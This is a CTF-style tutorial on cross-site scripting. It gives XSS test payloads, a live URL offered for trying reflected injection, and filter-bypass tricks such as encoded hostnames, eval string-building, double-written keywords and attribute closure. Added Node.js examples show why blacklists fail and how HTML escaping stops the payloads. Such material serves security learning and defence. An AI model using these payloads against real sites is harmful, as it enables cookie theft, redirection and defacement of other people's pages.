
ctf-XSS

XSS#

  1. What is XSS?
    Cross-Site Scripting is abbreviated XSS to avoid confusion with Cascading Style Sheets (CSS). An attacker injects malicious HTML or JavaScript into a web page; when other users view that page, their browser runs the injected code in their session, achieving the attacker's goal.

  2. The harm of XSS
    Stealing the session cookie through document.cookie (possible whenever the cookie is not marked HttpOnly)
    Using JavaScript or CSS to break the page's normal structure and style (defacement)
    Redirecting traffic: the injected script assigns window.location.href to send the user to another page, etc.

XSS Attack#

Reflected:

  • The attacker builds a malicious link in advance and lures users into clicking it, for example url?params=<script>alert("XSS attack")</script>.
  • It appears wherever user input is echoed back into the response, such as a search box.
  • Try it, URL: http://dm.unrun.top/classkey.php?page=1&classkey=

The classkey parameter carries the search term.

Enter <script>alert("XSS attack")</script> in the search box and submit.

The JavaScript runs: classkey.php does not process the user input at all and writes it straight into the page. This is a reflected XSS vulnerability, and it can be used for real attacks, such as stealing users' cookies.

JavaScript to read the cookies: alert(document.cookie)

Then enter <script>alert(document.cookie)</script>
A pop-up appears showing the cookies. dm.unrun.top sets no cookies, so the box is empty.

In the same way, the injected JavaScript can send the cookie to a server the attacker prepared in advance instead of merely displaying it (a cookie marked HttpOnly is not readable from document.cookie, so it is not exposed this way).


Common test statements for XSS#

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<a href=javascript:alert(1)>

When characters are filtered#

Use / instead of spaces between attributes

<img/src="x"/onerror=alert("xss");>

Use the Chinese full stop (。) instead of the ASCII dot
When the browser resolves the hostname it normalizes 。 to ., so a filter that blocks . is bypassed

<img src="x" onerror="document.location=`http://www。baidu。com`">

Use URL encoding; the browser percent-decodes the hostname when it follows the URL

<img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>

Use a protocol-relative // instead of http://

<img src="x" onerror=document.location=`//www.baidu.com`>

Build the call from string fragments and run it with eval

<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">

Double-write bypass#

When script is filtered

The server deletes these keywords by replacing them with the empty string:

$input = str_replace("script", "", $input);
$input = str_replace("on", "", $input);
$input = str_replace("src", "", $input);
$input = str_replace("data", "", $input);
$input = str_replace("href", "", $input);

Write each keyword inside itself, e.g. scrscriptipt, oonn, ssrcrc: the single pass deletes the inner copy and the surrounding fragments join back into script, on, src. This only works when the filter runs once rather than repeating until nothing changes; note also that str_replace is case-sensitive, so <ScRiPt> slips through as well.
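The double-write trick replayed in Node.js, as an added example that is not code from the original post. naiveFilter mirrors the single-pass str_replace() calls above; fixedPointFilter is the obvious fix (repeat until nothing changes) and goes a little beyond the text by also showing why a case-sensitive blacklist misses <ScRiPt>. The function names and the payload list are constructed for this illustration.

```javascript
// Added example (not from the original post): the "double-write" bypass against a
// single-pass keyword blacklist, and a fixed-point filter that closes the hole.
// The keyword list mirrors the str_replace() calls above.
const BLACKLIST = ["script", "on", "src", "data", "href"];

// One pass per keyword, like PHP's str_replace($kw, "", $input): each keyword is
// deleted once, and the characters on either side of the deleted piece are joined.
function naiveFilter(input) {
  let out = input;
  for (const kw of BLACKLIST) {
    out = out.split(kw).join("");
  }
  return out;
}

// Keep filtering until the string stops changing, so keywords that were
// re-assembled by a previous pass get deleted as well.
function fixedPointFilter(input) {
  let prev;
  let out = input;
  do {
    prev = out;
    out = naiveFilter(out);
  } while (out !== prev);
  return out;
}

// Build the double-written form of a keyword: "script" -> "scrscriptipt".
// Splitting in the middle is arbitrary; any split works as long as the inner copy is whole.
function doubleWrite(kw) {
  const mid = Math.floor(kw.length / 2);
  return kw.slice(0, mid) + kw + kw.slice(mid);
}

// Constructed payloads for the demo.
const PAYLOADS = [
  `<${doubleWrite("script")}>alert(1)</${doubleWrite("script")}>`,
  `<img ${doubleWrite("src")}=x ${doubleWrite("on")}error=alert(1)>`,
  "<ScRiPt>alert(1)</ScRiPt>", // case-sensitive str_replace never touches this one
];

for (const p of PAYLOADS) {
  console.log("payload :", p);
  console.log("naive   :", naiveFilter(p));   // keyword survives (or re-forms)
  console.log("fixed   :", fixedPointFilter(p)); // keyword gone, but the tag shell remains
}
```

Note what the fixed-point version still leaves behind: `<>alert(1)</>` is harmless, but deleting "on" from arbitrary text also mangles legitimate words, which is why a deny-list on keywords is the wrong tool; output encoding for the context (HTML body, attribute, URL) is what actually stops XSS.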

Tag closure bypass#

The browser closes an attribute value at the first quote that matches the one it was opened with. If the value contains a second ', everything after that quote is no longer part of the attribute and is parsed as markup.

<input type="text" value='<script>alert("XSS")</script>'>

Prefix the payload with '>, giving '><script>alert("XSS")</script>: the ' closes the value and the > closes the input tag, so the script element stands on its own

<input type="text" value=''><script>alert("XSS")</script>'>

Pseudo-protocol bypass#

When event handlers cannot be triggered, use a pseudo-protocol such as javascript: or data: and put the code after the colon
<object data=javascript:alert(1)>

<a href="javascript:alert(`xss`);">xss</a>

The call itself can also be written in these forms (the template-literal form alert`1` needs no parentheses, useful when ( ) are filtered):

(alert)(1);	 alert(1);  alert`1`;

URL parsing process#

The order in which the browser decodes a payload that lands in the page:
HTML parsing -> URL parsing -> JavaScript parsing (CSS parsing applies when the value lands in a style context)

  1. When the browser receives an HTML document, the HTML parser tokenizes it. HTML entity decoding (&lt;, &#x3c; ...) happens here, in text and in attribute values, and the DOM tree is built.
  2. If an attribute holds a URL (href, src, data, ...), the URL parser decodes the percent-encoding when that URL is used; for a javascript: URL the decoded remainder becomes the script source.
  3. Finally the JavaScript parser handles inline scripts and javascript: URLs, resolving JavaScript escapes such as \uXXXX.

Which decoders run, and in what order, depends on where the payload sits: a javascript: URL in an href is HTML-decoded, then percent-decoded, then parsed as JavaScript, while the content of a <script> element is never HTML-decoded and only the JavaScript parser applies.

XSS encoding issues#

  1. HTML character entities:
    When an HTML page is rendered, special characters such as "<" or ">" used directly would be taken by the browser as the start or end of a tag. To display them literally, their character entities are used. A named entity is "&" + the predefined entity name + ";", e.g. "<" is &lt;. A numeric entity is "&#" + the character's decimal code point + ";" (or "&#x" + the hexadecimal code point + ";"; both are parsed), e.g. "<" is &#60; or &#x3c;.
  2. JavaScript encoding: the most common form is "\uXXXX", a Unicode escape sequence for one character, where XXXX is the hexadecimal code point; e.g. "<" is "\u003c".
  3. URL encoding: "%" followed by the byte value in two hexadecimal digits (non-ASCII characters are UTF-8 encoded first, one %XX per byte); e.g. "/" is %2f.
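The three decoding layers replayed step by step, as an added example that is not code from the original post. It feeds one href value in which every layer is obfuscated once (HTML entity, percent-encoding, JavaScript \u escape) and reports what each parser hands to the next, ending with the source the JS engine actually runs. htmlDecode is a toy that knows only numeric entities and a handful of names, urlStage and jsDecode are simplified models of the browser's behaviour, and whatRuns is a made-up name; all sample inputs are constructed.

```javascript
// Added example (not from the original post): the decoding layers a browser applies
// to a URL-valued attribute such as <a href="...">, replayed one stage at a time.

// Stage 1: HTML attribute decoding. Handles &#NNN;, &#xHH; and the named entities
// used in this post; a real parser knows ~2000 names, this toy one is enough here.
const NAMED = { lt: "<", gt: ">", amp: "&", quot: '"', apos: "'" };
function htmlDecode(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (m, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      return String.fromCodePoint(hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10));
    }
    const name = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : m;
  });
}

// Stage 2: URL decoding. For a javascript: URL the browser percent-decodes
// everything after the scheme and hands it to the JS engine as script source.
// Scheme matching is ASCII case-insensitive and leading whitespace is ignored.
function urlStage(url) {
  const m = /^\s*([a-z][a-z0-9+.-]*):(.*)$/is.exec(url);
  if (!m) return { scheme: null, body: url };
  const scheme = m[1].toLowerCase();
  let body = m[2];
  if (scheme === "javascript") {
    try { body = decodeURIComponent(body); } catch (e) { /* malformed %xx: keep as-is */ }
  }
  return { scheme, body };
}

// Stage 3: JavaScript source decoding. The JS parser resolves \uXXXX, \u{...} and
// \xHH escapes inside identifiers and string literals, so \u0061lert is the
// identifier alert. (Simplified: a real parser only resolves these in those positions.)
function jsDecode(src) {
  return src
    .replace(/\\u\{([0-9a-f]+)\}/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Replay all three layers for an href attribute value and report each stage.
// script is null when the URL is not a javascript: URL (nothing would execute).
function whatRuns(attrValue) {
  const afterHtml = htmlDecode(attrValue);
  const { scheme, body } = urlStage(afterHtml);
  const script = scheme === "javascript" ? jsDecode(body) : null;
  return { afterHtml, scheme, body, script };
}

// Constructed sample: j is an HTML entity, the backslash is percent-encoded,
// the a of alert is a JS escape, yet alert(1) still reaches the engine.
const sample = "&#x6a;avascript&#58;%5cu0061lert&#40;1&#41;";
console.log(whatRuns(sample));
```

The caveat the page's order implies, made concrete: the same `&#x6a;avascript&#58;...` string placed inside a `<script>` element stays literal, because stage 1 never runs on script content; only JavaScript escapes work there. Conversely, a filter that runs on the raw attribute value and looks for the string "javascript:" is defeated by any one of these layers.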

Common escape characters#

Output encoding for HTML (any HTML online encoding conversion tool produces the same mapping):

For XSS

Character    Escaped form
&            &amp;
<            &lt;
>            &gt;
"            &quot;
'            &#x27;
/            &#x2F;
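The escape table put to work against the payloads from this post, as an added example that is not code from the original post or from dm.unrun.top. renderPage is a Node.js stand-in for the echoing classkey.php page: the search term lands in a single-quoted attribute (the target of the '> closure payload) and in element text (the target of a bare <script>), once unescaped and once through escapeHtml. injectedTags is a demo-only check that lists the tags the search term added beyond the template's own markup; renderPage, injectedTags and the template itself are constructed for this illustration.

```javascript
// Added example (not code from the original post): the escape table above as a
// function, a vulnerable and a safe rendering of the classkey search page, and a
// demo-only check of whether a payload created markup.

// "&" must be in the table: otherwise a user-supplied "&lt;" would survive and be
// decoded by the browser into a real "<".
const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };

function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => ESCAPES[c]);
}

// The search page (constructed template). escape=false reproduces classkey.php's
// behaviour of writing the raw parameter into the page.
function renderPage(classkey, escape) {
  const v = escape ? escapeHtml(classkey) : classkey;
  return `<form><input type="text" name="classkey" value='${v}'></form>\n` +
         `<h2>Results for ${v}</h2>`;
}

// Tag extractor that respects quoted attribute values (so "<img ...>" inside
// value='...' is attribute text, as in a real tokenizer). Good enough for the
// payloads in this post; a production check would use an HTML parser.
function tagsOf(html) {
  const names = [];
  for (const m of html.matchAll(/<\/?([a-z][a-z0-9]*)\b(?:[^>"']|"[^"]*"|'[^']*')*>/gi)) {
    names.push(m[1].toLowerCase());
  }
  return names;
}

// Which tags did the search term add beyond the template's own markup?
// An empty list means the payload stayed inert data.
function injectedTags(classkey, escape) {
  const seen = tagsOf(renderPage(classkey, escape));
  for (const t of tagsOf(renderPage("", escape))) {
    const i = seen.indexOf(t);
    if (i !== -1) seen.splice(i, 1);
  }
  return seen;
}

// Constructed inputs: the four test statements plus the attribute-closure payload.
const PAYLOADS = [
  '<script>alert(1)</script>',
  '<img src=x onerror=alert(1)>',
  '<svg onload=alert(1)>',
  '<a href=javascript:alert(1)>',
  `'><script>alert("XSS")</script>`,
];

for (const p of PAYLOADS) {
  console.log(p);
  console.log("  raw     ->", injectedTags(p, false)); // new tags: the payload became markup
  console.log("  escaped ->", injectedTags(p, true));  // [] : the payload is displayed as text
}
```

Two things the run makes visible. First, the plain `<script>` payload only becomes a tag in the text context; inside the quoted attribute it is just attribute text, which is exactly why the `'>` variant exists: it first closes the attribute and the input tag, and then adds four script tags (two in each context). Second, escaping `'` to `&#x27;` is what keeps the single-quoted attribute closed; a table that only covers `<` and `>` would leave the attribute context exploitable.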

HackBar Tool#

HackBar Download: https://github.com/HCTYMFF/hackbar2.1.3

HackBar is a browser plugin that contains some commonly used tools, such as SQL injection, XSS, encryption, etc.

Location: press F12 and open the HackBar tab on the far right of the developer tools

Convenient for URL encoding conversion

Three buttons on the right: Load URL - Split URL - Execute

GET parameters can be typed straight into the address bar, but a POST body cannot, so POST submissions need a tool like this.
